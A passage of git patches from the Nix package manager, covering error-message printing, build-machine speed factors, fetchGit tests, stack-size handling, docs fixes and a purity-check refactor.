EvalState::printStatistics() std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string", showType()) + .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), *this) }); } diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index aba2eaeae..e03746ece 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -36,11 +36,17 @@ struct PrintOptions */ size_t maxDepth = std::numeric_limits::max(); /** - * Maximum number of attributes in an attribute set to print. + * Maximum number of attributes in attribute sets to print. + * + * Note that this is a limit for the entire print invocation, not for each + * attribute set encountered. */ size_t maxAttrs = std::numeric_limits::max(); /** * Maximum number of list items to print. + * + * Note that this is a limit for the entire print invocation, not for each + * list encountered. */ size_t maxListItems = std::numeric_limits::max(); /** diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index dad6dc9ad..702e4bfe8 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -20,7 +20,7 @@ void printElided( { if (ansiColors) output << ANSI_FAINT; - output << " «"; + output << "«"; pluralize(output, value, single, plural); output << " elided»"; if (ansiColors) @@ -37,7 +37,7 @@ printLiteralString(std::ostream & str, const std::string_view string, size_t max str << "\""; for (auto i = string.begin(); i != string.end(); ++i) { if (charsPrinted >= maxLength) { - str << "\""; + str << "\" "; printElided(str, string.length() - charsPrinted, "byte", "bytes", ansiColors); return str; } @@ -161,6 +161,8 @@ private: EvalState & state; PrintOptions options; std::optional seen; + size_t attrsPrinted = 0; + size_t listItemsPrinted = 0; void printRepeated() { @@ -279,7 +281,6 @@ private: else std::sort(sorted.begin(), sorted.end(), ImportantFirstAttrNameCmp()); - size_t attrsPrinted = 0; for (auto & i : sorted) { if (attrsPrinted >= options.maxAttrs) { printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); @@ -307,7 +308,6 @@ private: output << "[ "; if (depth < options.maxDepth) { - size_t listItemsPrinted = 0; for (auto elem : v.listItems()) { if (listItemsPrinted >= options.maxListItems) { printElided(v.listSize() - listItemsPrinted, "item", "items"); @@ -486,6 +486,9 @@ public: void print(Value & v) { + attrsPrinted = 0; + listItemsPrinted = 0; + if (options.trackRepeated) { seen.emplace(); } else { diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index b461b2e02..5ae53034d 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: «lambda @ /pwd/lang/eval-fail-bad-string-interpolation-1.nix:1:4» diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index 95f4c2460..170a3d132 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: «lambda @ /pwd/lang/eval-fail-bad-string-interpolation-3.nix:1:5» diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp index 4950f8ddb..5119238d7 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -6,4 +6,4 @@ error: | ^ 10| - error: cannot coerce a set to a string + error: cannot coerce a set to a string: { a = { a = { a = { a = "ha"; b = "ha"; c = "ha"; d = "ha"; e = "ha"; f = "ha"; g = "ha"; h = "ha"; j = "ha"; }; «4294967295 attributes elided»}; «4294967294 attributes elided»}; «4294967293 attributes elided»} diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index f0cad58bb..b6fbf02fe 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string", "a Boolean"), + hintfmt("cannot coerce %s to a string: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }"), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1057,7 +1057,7 @@ namespace nix { ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1143,7 +1143,7 @@ namespace nix { ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string", "an integer"), + hintfmt("cannot coerce %s to a string: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1229,12 +1229,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"drv\"; }", @@ -1279,17 +1279,17 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; FOO = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index 98131112e..c4264a38d 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -370,7 +370,7 @@ TEST_F(ValuePrintingTests, ansiColorsStringElided) v.mkString("puppy"); test(v, - ANSI_MAGENTA "\"pup\"" ANSI_FAINT " «2 bytes elided»" ANSI_NORMAL, + ANSI_MAGENTA "\"pup\" " ANSI_FAINT "«2 bytes elided»" ANSI_NORMAL, PrintOptions { .ansiColors = true, .maxStringLength = 3 @@ -756,7 +756,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «1 attribute elided»" ANSI_NORMAL "}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«1 attribute elided»" ANSI_NORMAL "}", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -769,7 +769,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «2 attributes elided»" ANSI_NORMAL "}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«2 attributes elided»" ANSI_NORMAL "}", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -793,7 +793,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 2; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «1 item elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item elided»" ANSI_NORMAL "]", PrintOptions { .ansiColors = true, .maxListItems = 1 @@ -806,7 +806,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 3; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «2 items elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL "]", PrintOptions { .ansiColors = true, .maxListItems = 1 From 1e24db6f9a7a36ddba1a591da8ddf5f5c9ec3f83 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 24 Jan 2024 01:03:07 -0500 Subject: [PATCH 342/654] Convert `Machine::speedFactor` from a non-neg int to a non-neg float The short motivation is to match Hydra, so we can de-dup. The long version is layed out in https://github.com/NixOS/nix/issues/9840. --- src/libstore/machines.cc | 17 ++++++++++++++--- src/libstore/machines.hh | 2 +- tests/unit/libstore/machines.cc | 3 ++- 3 files changed, 17 insertions(+), 5 deletions(-) diff --git a/src/libstore/machines.cc b/src/libstore/machines.cc index 561d8d557..2d461c63a 100644 --- a/src/libstore/machines.cc +++ b/src/libstore/machines.cc @@ -32,11 +32,14 @@ Machine::Machine(decltype(storeUri) storeUri, systemTypes(systemTypes), sshKey(sshKey), maxJobs(maxJobs), - speedFactor(std::max(1U, speedFactor)), + speedFactor(speedFactor == 0.0f ? 1.0f : std::move(speedFactor)), supportedFeatures(supportedFeatures), mandatoryFeatures(mandatoryFeatures), sshPublicHostKey(sshPublicHostKey) -{} +{ + if (speedFactor < 0.0) + throw UsageError("speed factor must be >= 0"); +} bool Machine::systemSupported(const std::string & system) const { @@ -135,6 +138,14 @@ static Machine parseBuilderLine(const std::string & line) return result.value(); }; + auto parseFloatField = [&](size_t fieldIndex) { + const auto result = string2Int(tokens[fieldIndex]); + if (!result) { + throw FormatError("bad machine specification: failed to convert column #%lu in a row: '%s' to 'float'", fieldIndex, line); + } + return result.value(); + }; + auto ensureBase64 = [&](size_t fieldIndex) { const auto & str = tokens[fieldIndex]; try { @@ -153,7 +164,7 @@ static Machine parseBuilderLine(const std::string & line) isSet(1) ? tokenizeString>(tokens[1], ",") : std::set{settings.thisSystem}, isSet(2) ? tokens[2] : "", isSet(3) ? parseUnsignedIntField(3) : 1U, - isSet(4) ? parseUnsignedIntField(4) : 1U, + isSet(4) ? parseFloatField(4) : 1.0f, isSet(5) ? tokenizeString>(tokens[5], ",") : std::set{}, isSet(6) ? tokenizeString>(tokens[6], ",") : std::set{}, isSet(7) ? ensureBase64(7) : "" diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index 1bca74c28..8516409d4 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -13,7 +13,7 @@ struct Machine { const std::set systemTypes; const std::string sshKey; const unsigned int maxJobs; - const unsigned int speedFactor; + const float speedFactor; const std::set supportedFeatures; const std::set mandatoryFeatures; const std::string sshPublicHostKey; diff --git a/tests/unit/libstore/machines.cc b/tests/unit/libstore/machines.cc index 5b66e5a5b..9fd7fda54 100644 --- a/tests/unit/libstore/machines.cc +++ b/tests/unit/libstore/machines.cc @@ -14,6 +14,7 @@ using testing::SizeIs; using nix::absPath; using nix::FormatError; +using nix::UsageError; using nix::getMachines; using nix::Machine; using nix::Machines; @@ -133,7 +134,7 @@ TEST(machines, getMachinesWithIncorrectFormat) { settings.builders = "nix@scratchy.labs.cs.uu.nl - - 8 three"; EXPECT_THROW(getMachines(), FormatError); settings.builders = "nix@scratchy.labs.cs.uu.nl - - 8 -3"; - EXPECT_THROW(getMachines(), FormatError); + EXPECT_THROW(getMachines(), UsageError); settings.builders = "nix@scratchy.labs.cs.uu.nl - - 8 3 - - BAD_BASE64"; EXPECT_THROW(getMachines(), FormatError); } From 6532dd50fc4f2de79f6a187145a3d554b5a6f03a Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 24 Jan 2024 13:19:02 +0100 Subject: [PATCH 343/654] tests/functional/fetchGit.sh: Test fetchGit/fetchTree error message Follow-up for https://github.com/NixOS/nix/pull/9626 176dcd5c617367dbff6d5455856a25518326f79d --- tests/functional/fetchGit.sh | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index 46532c025..c6a482035 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -66,6 +66,9 @@ path2=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \" # In pure eval mode, fetchGit with a revision should succeed. [[ $(nix eval --raw --expr "builtins.readFile (fetchGit { url = file://$repo; rev = \"$rev2\"; } + \"/hello\")") = world ]] +# But without a hash, it fails +expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "'fetchGit' requires a locked input" + # Fetch again. This should be cached. mv $repo ${repo}-tmp path2=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$repo).outPath") @@ -205,6 +208,8 @@ path6=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; ur [[ $path3 = $path6 ]] [[ $(nix eval --impure --expr "(builtins.fetchTree { type = \"git\"; url = \"file://$TEST_ROOT/shallow\"; ref = \"dev\"; shallow = true; }).revCount or 123") == 123 ]] +expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "'fetchTree' requires a locked input" + # Explicit ref = "HEAD" should work, and produce the same outPath as without ref path7=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; ref = \"HEAD\"; }).outPath") path8=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; }).outPath") From c81730541133d271c040df92600333cf188dc5a4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 15:37:15 -0500 Subject: [PATCH 344/654] Link both gmock and gtest, not just gtest GMock is not entirely header-only, we're finding. --- configure.ac | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac index f46cff732..8c29c1e62 100644 --- a/configure.ac +++ b/configure.ac @@ -351,7 +351,7 @@ fi AS_IF([test "$ENABLE_UNIT_TESTS" == "yes"],[ # Look for gtest. -PKG_CHECK_MODULES([GTEST], [gtest_main]) +PKG_CHECK_MODULES([GTEST], [gtest_main gmock_main]) # Look for rapidcheck. PKG_CHECK_MODULES([RAPIDCHECK], [rapidcheck rapidcheck_gtest]) From a9e10a1dbdbc673614c1f27e889a7a0f7e470462 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 24 Jan 2024 21:32:29 -0500 Subject: [PATCH 345/654] Make `StoreConfig::getDefaultSystemFeatures` a static method This makes something in Hydra bit simpler. If someday the default depends on the other config options, we can always change it back. --- src/libstore/store-api.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 876ebf384..5163070b2 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -108,7 +108,7 @@ struct StoreConfig : public StoreDirConfig StoreConfig() = delete; - StringSet getDefaultSystemFeatures(); + static StringSet getDefaultSystemFeatures(); virtual ~StoreConfig() { } From 08f38a3a4030e765f63e6b02e0094d33083c401b Mon Sep 17 00:00:00 2001 From: lexi Date: Thu, 25 Jan 2024 15:30:51 +0100 Subject: [PATCH 346/654] Fix typo in primops.cc (and therefore Nix docs) This also fixes the typo in the Nix docs at https://nixos.org/manual/nix/unstable/language/builtins. --- src/libexpr/primops.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 5032e95cc..993ecceb2 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1878,7 +1878,7 @@ static RegisterPrimOp primop_outputOf({ For instance, ```nix builtins.outputOf - (builtins.outputOf myDrv "out) + (builtins.outputOf myDrv "out") "out" ``` will return a placeholder for the output of the output of `myDrv`. From 30bdee5c3b6beb88dae48771191de5d0620db6ba Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 26 Jan 2024 18:26:08 +0100 Subject: [PATCH 347/654] update docs on `fetchGit` shallow clone behavior (#9704) --- src/libexpr/primops/fetchTree.cc | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index d32c264f7..a943095bb 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -614,8 +614,7 @@ static RegisterPrimOp primop_fetchGit({ - `shallow` (default: `false`) - A Boolean parameter that specifies whether fetching from a shallow remote repository is allowed. - This still performs a full clone of what is available on the remote. + Make a shallow clone when fetching the Git tree. - `allRefs` From 3a124d1e88c8cbac6fbaf4709b8b4ee92f58ff30 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 26 Jan 2024 09:40:41 -0800 Subject: [PATCH 348/654] Increase stack size on macOS as well as Linux The code works fine on macOS, but the default stack size we attempt to set is larger than what my system will allow (Nix attempts to set the stack size to 67108864, but the maximum allowed is 67092480), so I've instead used the requested stack size or the maximum allowed, whichever is smaller. I've also added an error message if setting the stack size fails. It looks like this: > Failed to increase stack size from 8372224 to 67108864 (maximum > allowed stack size: 67092480): Invalid argument --- src/libutil/current-process.cc | 26 +++++++++++++++++--------- src/libutil/current-process.hh | 2 +- 2 files changed, 18 insertions(+), 10 deletions(-) diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc index 352a6a0fb..01f64f211 100644 --- a/src/libutil/current-process.cc +++ b/src/libutil/current-process.cc @@ -1,3 +1,6 @@ +#include +#include + #include "current-process.hh" #include "namespaces.hh" #include "util.hh" @@ -49,20 +52,27 @@ unsigned int getMaxCPU() ////////////////////////////////////////////////////////////////////// -#if __linux__ rlim_t savedStackSize = 0; -#endif -void setStackSize(size_t stackSize) +void setStackSize(rlim_t stackSize) { - #if __linux__ struct rlimit limit; if (getrlimit(RLIMIT_STACK, &limit) == 0 && limit.rlim_cur < stackSize) { savedStackSize = limit.rlim_cur; - limit.rlim_cur = stackSize; - setrlimit(RLIMIT_STACK, &limit); + limit.rlim_cur = std::min(stackSize, limit.rlim_max); + if (setrlimit(RLIMIT_STACK, &limit) != 0) { + logger->log( + lvlError, + hintfmt( + "Failed to increase stack size from %1% to %2% (maximum allowed stack size: %3%): %4%", + savedStackSize, + stackSize, + limit.rlim_max, + std::strerror(errno) + ).str() + ); + } } - #endif } void restoreProcessContext(bool restoreMounts) @@ -72,7 +82,6 @@ void restoreProcessContext(bool restoreMounts) restoreMountNamespace(); } - #if __linux__ if (savedStackSize) { struct rlimit limit; if (getrlimit(RLIMIT_STACK, &limit) == 0) { @@ -80,7 +89,6 @@ void restoreProcessContext(bool restoreMounts) setrlimit(RLIMIT_STACK, &limit); } } - #endif } diff --git a/src/libutil/current-process.hh b/src/libutil/current-process.hh index 826d6fe20..97ea70bf4 100644 --- a/src/libutil/current-process.hh +++ b/src/libutil/current-process.hh @@ -16,7 +16,7 @@ unsigned int getMaxCPU(); /** * Change the stack size. */ -void setStackSize(size_t stackSize); +void setStackSize(rlim_t stackSize); /** * Restore the original inherited Unix process context (such as signal From 772897a1cd46fc3875f0ffa54cf2661d9ef17494 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 26 Jan 2024 10:08:56 -0800 Subject: [PATCH 349/654] Color `diff` output in `tests/functional/lang` tests Use `diff --color=always` to print colored output for language test failures. I've also flipped the arguments so that expected lines missing from the actual output will be marked with a red `-` and additional lines found in the actual output will be marked with a green `+`. Previously it was the other way around, which was very confusing. --- tests/functional/lang/framework.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/lang/framework.sh b/tests/functional/lang/framework.sh index 516bff8ad..9b886e983 100644 --- a/tests/functional/lang/framework.sh +++ b/tests/functional/lang/framework.sh @@ -16,7 +16,7 @@ function diffAndAcceptInner() { fi # Diff so we get a nice message - if ! diff --unified "$got" "$expectedOrEmpty"; then + if ! diff --color=always --unified "$expectedOrEmpty" "$got"; then echo "FAIL: evaluation result of $testName not as expected" badDiff=1 fi From 1aec7771d4560d91ef97c18d9b5cdb29dde132a7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 26 Jan 2024 22:34:31 -0500 Subject: [PATCH 350/654] Add missing `#include` for `rlim_t` My local build in the shell was failing while CI was fine; not sure why that is but having the include here is definitely more correct. Per the POSIX spec, this is where it is supposed to be gotten https://pubs.opengroup.org/onlinepubs/009695399/basedefs/sys/resource.h.html --- src/libutil/current-process.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libutil/current-process.hh b/src/libutil/current-process.hh index 97ea70bf4..444c717d1 100644 --- a/src/libutil/current-process.hh +++ b/src/libutil/current-process.hh @@ -2,6 +2,7 @@ ///@file #include +#include #include "types.hh" From 365b831e6f290c733da6879dae871dada343a1eb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 26 Jan 2024 23:11:31 -0500 Subject: [PATCH 351/654] Minor formatting tweaks --- src/libexpr/parser-state.hh | 25 ++++++++++++++++--------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index a5b932ae8..0a9f076dc 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -1,19 +1,25 @@ #pragma once +///@file #include "eval.hh" namespace nix { -// using C a struct allows us to avoid having to define the special -// members that using string_view here would implicitly delete. -struct StringToken { - const char * p; - size_t l; - bool hasIndentation; - operator std::string_view() const { return {p, l}; } +/** + * @note Storing a C-style `char *` and `size_t` allows us to avoid + * having to define the special members that using string_view here + * would implicitly delete. + */ +struct StringToken +{ + const char * p; + size_t l; + bool hasIndentation; + operator std::string_view() const { return {p, l}; } }; -struct ParserLocation { +struct ParserLocation +{ int first_line, first_column; int last_line, last_column; @@ -36,7 +42,8 @@ struct ParserLocation { } }; -struct ParserState { +struct ParserState +{ SymbolTable & symbols; PosTable & positions; Expr * result; From 49b25ea85c9695a0668f65bff5839aa3feccd263 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 15 Jan 2024 08:17:42 +0100 Subject: [PATCH 352/654] refactor: Impure derivation type isPure -> isImpure To quote the method doc: Non-impure derivations can still behave impurely, to the degree permitted by the sandbox. Hence why this method isn't `isPure`: impure derivations are not the negation of pure derivations. Purity can not be ascertained except by rather heavy tools. --- src/libstore/build/derivation-goal.cc | 18 +++++++++--------- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/derivations.cc | 10 +++++----- src/libstore/derivations.hh | 13 +++++++++---- 4 files changed, 24 insertions(+), 19 deletions(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index f8728ed4a..00cbf4228 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -223,7 +223,7 @@ void DerivationGoal::haveDerivation() if (!drv->type().hasKnownOutputPaths()) experimentalFeatureSettings.require(Xp::CaDerivations); - if (!drv->type().isPure()) { + if (drv->type().isImpure()) { experimentalFeatureSettings.require(Xp::ImpureDerivations); for (auto & [outputName, output] : drv->outputs) { @@ -304,7 +304,7 @@ void DerivationGoal::outputsSubstitutionTried() { trace("all outputs substituted (maybe)"); - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); if (nrFailed > 0 && nrFailed > nrNoSubstituters + nrIncompleteClosure && !settings.tryFallback) { done(BuildResult::TransientFailure, {}, @@ -397,9 +397,9 @@ void DerivationGoal::gaveUpOnSubstitution() for (const auto & [inputDrvPath, inputNode] : dynamic_cast(drv.get())->inputDrvs.map) { /* Ensure that pure, non-fixed-output derivations don't depend on impure derivations. */ - if (experimentalFeatureSettings.isEnabled(Xp::ImpureDerivations) && drv->type().isPure() && !drv->type().isFixed()) { + if (experimentalFeatureSettings.isEnabled(Xp::ImpureDerivations) && !drv->type().isImpure() && !drv->type().isFixed()) { auto inputDrv = worker.evalStore.readDerivation(inputDrvPath); - if (!inputDrv.type().isPure()) + if (inputDrv.type().isImpure()) throw Error("pure derivation '%s' depends on impure derivation '%s'", worker.store.printStorePath(drvPath), worker.store.printStorePath(inputDrvPath)); @@ -439,7 +439,7 @@ void DerivationGoal::gaveUpOnSubstitution() void DerivationGoal::repairClosure() { - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); /* If we're repairing, we now know that our own outputs are valid. Now check whether the other paths in the outputs closure are @@ -1100,7 +1100,7 @@ void DerivationGoal::resolvedFinished() worker.store.printStorePath(resolvedDrvGoal->drvPath), outputName); }(); - if (drv->type().isPure()) { + if (!drv->type().isImpure()) { auto newRealisation = realisation; newRealisation.id = DrvOutput { initialOutput->outputHash, outputName }; newRealisation.signatures.clear(); @@ -1395,7 +1395,7 @@ void DerivationGoal::flushLine() std::map> DerivationGoal::queryPartialDerivationOutputMap() { - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); if (!useDerivation || drv->type().hasKnownOutputPaths()) { std::map> res; for (auto & [name, output] : drv->outputs) @@ -1411,7 +1411,7 @@ std::map> DerivationGoal::queryPartialDeri OutputPathMap DerivationGoal::queryDerivationOutputMap() { - assert(drv->type().isPure()); + assert(!drv->type().isImpure()); if (!useDerivation || drv->type().hasKnownOutputPaths()) { OutputPathMap res; for (auto & [name, output] : drv->outputsAndOptPaths(worker.store)) @@ -1428,7 +1428,7 @@ OutputPathMap DerivationGoal::queryDerivationOutputMap() std::pair DerivationGoal::checkPathValidity() { - if (!drv->type().isPure()) return { false, {} }; + if (drv->type().isImpure()) return { false, {} }; bool checkHash = buildMode == bmRepair; auto wantedOutputsLeft = std::visit(overloaded { diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index f85301950..2ba8be7d6 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -2724,7 +2724,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() .outPath = newInfo.path }; if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations) - && drv->type().isPure()) + && !drv->type().isImpure()) { signRealisation(thisRealisation); worker.store.registerDrvOutput(thisRealisation); diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 2fafcb8e7..393806652 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -110,17 +110,17 @@ bool DerivationType::isSandboxed() const } -bool DerivationType::isPure() const +bool DerivationType::isImpure() const { return std::visit(overloaded { [](const InputAddressed & ia) { - return true; + return false; }, [](const ContentAddressed & ca) { - return true; + return false; }, [](const Impure &) { - return false; + return true; }, }, raw); } @@ -840,7 +840,7 @@ DrvHash hashDerivationModulo(Store & store, const Derivation & drv, bool maskOut }; } - if (!type.isPure()) { + if (type.isImpure()) { std::map outputHashes; for (const auto & [outputName, _] : drv.outputs) outputHashes.insert_or_assign(outputName, impureOutputHash); diff --git 